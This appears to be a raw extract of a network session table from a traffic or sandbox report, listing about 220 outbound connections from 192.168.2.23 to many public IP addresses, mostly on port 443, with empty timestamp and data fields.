                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19471192.168.2.2347846179.127.233.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19472192.168.2.2353132107.49.132.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19473192.168.2.2340064148.61.29.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19474192.168.2.2350080189.227.221.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19475192.168.2.234156287.154.65.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19476192.168.2.235478614.17.50.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19477192.168.2.235881682.178.118.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19478192.168.2.235612491.70.59.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19479192.168.2.235483492.90.118.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19480192.168.2.235338232.54.197.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19481192.168.2.235812886.229.5.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19482192.168.2.234151853.206.6.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19483192.168.2.2347962196.98.182.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19484192.168.2.2360918173.211.110.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19485192.168.2.2343644152.188.129.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19486192.168.2.234315051.102.83.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19487192.168.2.233875246.173.20.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19488192.168.2.2344798183.9.178.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19489192.168.2.235477219.167.84.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19490192.168.2.2341960160.212.121.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19491192.168.2.235227845.79.51.2508080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19492192.168.2.2359952104.232.100.618080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19493192.168.2.234881823.49.46.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19494192.168.2.2345998145.92.192.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19495192.168.2.235570412.123.217.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19496192.168.2.234698473.55.204.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19497192.168.2.233903283.77.46.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19498192.168.2.234221613.185.70.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19499192.168.2.2351244182.166.241.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19500192.168.2.234676281.40.102.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19501192.168.2.2337622206.124.111.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19502192.168.2.2343000160.214.41.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19503192.168.2.234956023.169.177.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19504192.168.2.235746069.60.33.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19505192.168.2.2335268199.192.87.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19506192.168.2.2347708111.184.154.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19507192.168.2.2341228166.156.185.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19508192.168.2.2358322100.19.153.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19509192.168.2.233471612.164.155.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19510192.168.2.234713492.167.181.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19511192.168.2.234988088.251.33.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19512192.168.2.2359348207.171.190.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19513192.168.2.233606260.77.246.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19514192.168.2.234112671.13.17.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19515192.168.2.2342864100.162.53.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19516192.168.2.235211627.180.112.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19517192.168.2.234649443.232.13.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19518192.168.2.2352592196.244.142.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19519192.168.2.235820414.241.1.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19520192.168.2.2340780101.85.244.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19521192.168.2.2351910153.244.163.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19522192.168.2.2356822117.233.192.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19523192.168.2.2334004195.172.200.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19524192.168.2.23345301.174.167.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19525192.168.2.2354266182.149.240.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19526192.168.2.2353952213.239.218.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19527192.168.2.2338352210.180.141.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19528192.168.2.23554944.188.242.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19529192.168.2.234913862.23.170.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19530192.168.2.235772877.39.102.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19531192.168.2.2349682177.53.202.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19532192.168.2.2357914163.194.73.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19533192.168.2.235406683.137.169.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19534192.168.2.2333684174.204.173.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19535192.168.2.2350812184.76.128.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19536192.168.2.2339268139.176.26.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19537192.168.2.233864473.101.164.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19538192.168.2.2335780219.129.27.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19539192.168.2.233620644.185.156.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19540192.168.2.233994283.17.170.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19541192.168.2.235084618.250.125.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19542192.168.2.2345064149.109.59.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19543192.168.2.2338258177.91.125.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19544192.168.2.233798842.128.169.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19545192.168.2.233654088.106.154.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19546192.168.2.234494838.157.79.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19547192.168.2.2347204166.222.177.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19548192.168.2.235765246.213.172.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19549192.168.2.234344253.167.154.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19550192.168.2.23600861.158.18.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19551192.168.2.2353472209.96.45.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19552192.168.2.233468280.252.219.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19553192.168.2.234257835.240.223.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19554192.168.2.2337918201.240.242.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19555192.168.2.2358662152.199.8.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19556192.168.2.2333876170.107.233.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19557192.168.2.2334710120.236.147.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19558192.168.2.235721671.235.95.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19559192.168.2.2335576134.25.27.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19560192.168.2.2336384158.208.38.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19561192.168.2.233643697.176.227.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19562192.168.2.2340228189.85.167.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19563192.168.2.2348996184.228.242.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19564192.168.2.2359290107.140.206.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19565192.168.2.2349776120.162.96.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19566192.168.2.233984296.198.100.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19567192.168.2.235082854.84.190.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19568192.168.2.2338262216.111.188.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19569192.168.2.2359604192.142.240.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19570192.168.2.2357362221.187.76.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19571192.168.2.2347460209.175.76.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19572192.168.2.23358341.173.30.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19573192.168.2.233448469.29.110.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19574192.168.2.233843218.190.13.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19575192.168.2.2352202167.251.245.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19576192.168.2.2344480155.125.192.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19577192.168.2.235605086.238.201.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19578192.168.2.235716675.117.54.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19579192.168.2.2348282107.83.35.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19580192.168.2.2357136103.131.56.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19581192.168.2.2357466218.47.134.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19582192.168.2.2351424170.222.87.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19583192.168.2.2340800166.4.252.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19584192.168.2.2343916202.152.184.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19585192.168.2.233587073.135.121.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19586192.168.2.2335556160.228.85.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19587192.168.2.233437274.29.130.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19588192.168.2.2356098207.218.229.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19589192.168.2.234532260.193.127.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19590192.168.2.2352628160.111.114.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19591192.168.2.234669254.61.131.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19592192.168.2.233417271.212.229.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19593192.168.2.233340458.125.67.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19594192.168.2.2349516173.70.198.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19595192.168.2.233806838.210.44.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19596192.168.2.2357520138.238.12.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19597192.168.2.233556466.247.107.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19598192.168.2.2352790213.238.235.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19599192.168.2.234998882.197.179.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19600192.168.2.2349234167.30.219.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19601192.168.2.2340220193.97.17.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19602192.168.2.2357716185.117.166.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19603192.168.2.2342982207.160.17.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19604192.168.2.23504749.148.157.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19605192.168.2.234112051.165.239.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19606192.168.2.233770467.27.124.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19607192.168.2.234975658.103.116.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19608192.168.2.2342938160.224.127.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19609192.168.2.2354008190.131.110.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19610192.168.2.2356470205.102.237.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19611192.168.2.234327640.206.106.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19612192.168.2.2334538143.129.70.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19613192.168.2.23494129.75.128.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19614192.168.2.2350492122.141.157.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19615192.168.2.233817899.56.112.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19616192.168.2.236002486.1.139.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19617192.168.2.235168643.243.13.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19618192.168.2.2345444117.57.185.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19619192.168.2.235783645.116.139.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19620192.168.2.235585094.210.221.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19621192.168.2.2354038216.38.120.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19622192.168.2.2343184153.240.183.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19623192.168.2.2338390213.237.35.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19624192.168.2.2349534155.152.161.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19625192.168.2.233310852.114.179.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19626192.168.2.2334950155.45.131.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19627192.168.2.2333854149.187.228.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19628192.168.2.2344386163.137.166.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19629192.168.2.2340750112.144.212.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19630192.168.2.2344736219.33.202.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19631192.168.2.234512043.36.205.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19632192.168.2.2343902142.230.7.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19633192.168.2.2338986170.189.44.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19634192.168.2.2341368100.186.40.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19635192.168.2.2345930120.71.171.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19636192.168.2.2351892162.246.177.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19637192.168.2.2349152162.249.201.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19638192.168.2.235728281.252.186.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19639192.168.2.233280054.59.53.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19640192.168.2.2360584137.249.11.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19641192.168.2.2337208194.96.79.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19642192.168.2.23499229.189.211.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19643192.168.2.233776074.227.119.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19644192.168.2.234402466.230.208.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19645192.168.2.2344580107.124.20.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19646192.168.2.2338330213.90.104.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19647192.168.2.235559265.83.152.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19648192.168.2.2350924222.217.249.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19649192.168.2.234615492.255.116.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19650192.168.2.2355582218.62.3.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19651192.168.2.236089025.170.203.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19652192.168.2.2337894108.72.54.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19653192.168.2.2338224193.103.76.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19654192.168.2.233427860.33.218.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19655192.168.2.2348218102.109.95.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19656192.168.2.2343862210.159.221.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19657192.168.2.2349114136.17.115.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19658192.168.2.234146240.248.206.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19659192.168.2.2354998209.208.250.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19660192.168.2.2334460161.84.252.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19661192.168.2.2358282190.61.42.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19662192.168.2.2334726191.137.247.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19663192.168.2.23366028.175.98.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19664192.168.2.2358444208.145.79.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19665192.168.2.235734261.77.132.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19666192.168.2.2343626163.116.213.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19667192.168.2.2342348199.12.113.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19668192.168.2.2359932218.161.152.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19669192.168.2.2346310219.161.214.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19670192.168.2.234882874.198.77.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19671192.168.2.234018269.236.127.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19672192.168.2.2357676204.216.180.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19673192.168.2.235705666.7.116.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19674192.168.2.235588690.224.205.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19675192.168.2.235657278.113.234.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19676192.168.2.234440482.247.183.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19677192.168.2.2359126183.157.204.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19678192.168.2.2344332187.114.6.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19679192.168.2.235843273.246.167.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19680192.168.2.2340128112.6.154.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19681192.168.2.2349648174.85.117.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19682192.168.2.2353554113.132.157.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19683192.168.2.2351826138.218.222.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19684192.168.2.2359550185.38.37.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19685192.168.2.2334090213.96.116.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19686192.168.2.23576804.153.161.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19687192.168.2.2338936220.155.201.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19688192.168.2.2335690208.97.115.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19689192.168.2.2350838135.192.214.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19690192.168.2.2343660146.37.239.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19691192.168.2.233434836.133.161.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19692192.168.2.2345680184.173.131.230443
